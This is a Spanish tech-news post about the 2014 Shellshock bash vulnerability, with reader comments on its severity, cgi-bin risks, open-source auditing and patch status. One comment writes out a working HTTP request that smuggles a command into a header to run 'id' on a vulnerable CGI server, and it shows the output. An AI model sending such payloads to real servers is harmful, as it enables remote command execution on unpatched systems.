Historias
Slashboxes
Comentarios
 

Vulnerabilidad explotable remotamente en bash

Entrada escrita por Draco y editada por mig21 el Miércoles, 24 Septiembre de 2014, 21:25h   Printer-friendly   Email story
desde el dept. update!!
Por raro que parezca hay una vulnerabilidad en bash que puede ser explotada remotamente en ciertos escenarios (CVE-2014-6271). Más información en el blog de seguridad de Red Hat y en el anuncio de seguridad de Debian. Ambas distribuciones disponen ya de actualización. Más comentarios en Slashdot o en Hacker News.

Mostrar opciones Umbral:
Y recuerda: Los comentarios que siguen pertenecen a las personas que los han enviado. No somos responsables de los mismos.
  • Mi lectura del aviso

    (Puntos:1, Interesante)
    por pobrecito hablador el Miércoles, 24 Septiembre de 2014, 21:56h (#1364594)

    this vulnerability is exposed in ssh---but only to authenticated sessions.


    O sea, que para liarla parda en un nuestro server SSH, el atacante debe tener acceso "normal" por contraseña o clave pública.
    [ Responder ]
  • parece más grave

    (Puntos:1, Informativo)
    por pobrecito hablador el Miércoles, 24 Septiembre de 2014, 22:49h (#1364597)
    Leyendo la noticia en otro sitio [securitybydefault.com] la cosa parece muchísimo más grave de lo que anuncia Barrapunto

    [ Responder ]
  • por JoseDiazFernandez (53802) el Jueves, 25 Septiembre de 2014, 14:21h (#1364646)
    Enviando esta petición HTTP contra un script bash: GET /cgi-bin/test.cgi HTTP/1.1 Host: ubuntu Accept:() { 0;};/usr/bin/id >/tmp/ejemplo.txt Esto creará un archivo en la ruta /tmp/ejemplo.txt con informacion del usuario: android@ubuntu:/$ cat /tmp/ejemplo.txt uid=1(daemon) gid=1(daemon) groups=1(daemon) android@ubuntu:/$
    [ Responder ]
  • Si gente, el cgi-bin es un agujero...

    (Puntos:3, Informativo)
    por puefale (4477) <{puefale} {at} {yahoo.com}> el Jueves, 25 Septiembre de 2014, 19:25h (#1364680)
    ( http://barrapunto.com/~puefale/bitacora | Última bitácora: Jueves, 01 Mayo de 2014, 10:26h )
    Vamos a ver, que parece que la peña no se acaba de enterar... Usar cgi-bin es un agujeraco de seguridad, si lo usas te arriesgas a que te ejecuten código en tus sistemas.

    Una vez tenemos claro que no hay que usar cgi-bin, vamos a ver, bash ejecuta un comando si lo pones como variable. Que explotación tiene? cgi-bin, bien, tienes un agujero en algo ya de base bastante inseguro de hacer. Lo que no quiere decir que si ejecutas cualquier otro interprete no se vea afectado en este caso. Pero igualmente, no uses cgi-bin.

    En el caso que sea con un usuario logado en el sistema... Pué bueno, pué fale, pué m'alegro. Ejecutas un comando que ya podrías haber ejecutado... Vale es un bug, pero bastante "folclórico".

    En los demás casos, son parecidos al cgi-bin, dejas ejecutar en remoto una bash, y tienes un problema con el paso de parámetros.

    Es un "gran" problema? Sí, si tienes webs que utilizan cgi-bin, cuando hace años que se recomienda que no se usen. Como siempre, aparte de los parches que salgan, el problema tiene que ver con las "buenas prácticas" en seguridad. En este caso, si has restringido correctamente los permisos con el que corre el cgi-bin sera que sea menor el problema. Si usas una bash que solo permita los comandos que vas a necesitar, menor aún, etc. El problema una vez logado, bueno, es problema de los settings de seguridad que tengas.

    Se han visto grandes titulares sobre el tema, pero un poco exagerados e incorrectos. Eso sí, ahora toca actualizar e ir pensando en migrar esos servicios que tienes en cgi-bin, la próxima vez tal vez no hayan tantos titulares, pero volverás a pillar por usarlo ^_^

    --
    Pué fueno, pué fale, pué m'alegro.
    Maquinavaja.
    [ Responder ]
  • Mil Millones de Ojos

    (Puntos:1, Informativo)
    por pobrecito hablador el Jueves, 25 Septiembre de 2014, 20:34h (#1364684)
    Una vez mas se refuta la teoría es que muchos ojos están mirando en FOSS ahora para encontrar bugs , ojos cansados que podían haber encontrado un bug tan sencillos cualquier momento en los últimos 25 años. Por lo tanto, sabemos que muchos ojos no han estado buscando en GNU bash, ese software sin importancia y poco usado.

    Se hunde la teoría promovida por los gurus del open-source que defiende que hay tantos ojos que ningun bug importante escapara de ellos. Lo que hemos visto es que, de hecho, muy pocas personas leen el código, incluso cuando es de código abierto usado a diario por millones de personas.

    Los desarrolladores FOSS con capacidad de leer y escribir código, prefieren escribir código. Las únicas personas que se invierte esa ecuación son los auditores de código profesionales - y que son contratados principalmente para auditar código fuente cerrado.

    [ Responder ]
  • Re:Y thu ?

    (Puntos:2)
    por DebianLinuxero (44490) el Jueves, 25 Septiembre de 2014, 16:46h (#1364671)
    Sí.

    En Debian Jessie.
    Y he hecho los 2 tests.

    El primer test me dice que está parcheado, que no es vulnerable.
    Y el segundo me dice que es vulnerable. Habrá que esperar a que lo vuelvan a arreglar.

    Creo que Arch Linux ya tiene un parche que corrige las dos vulnerabilidades.
  • 6 respuestas por debajo de tu umbral de lectura actual.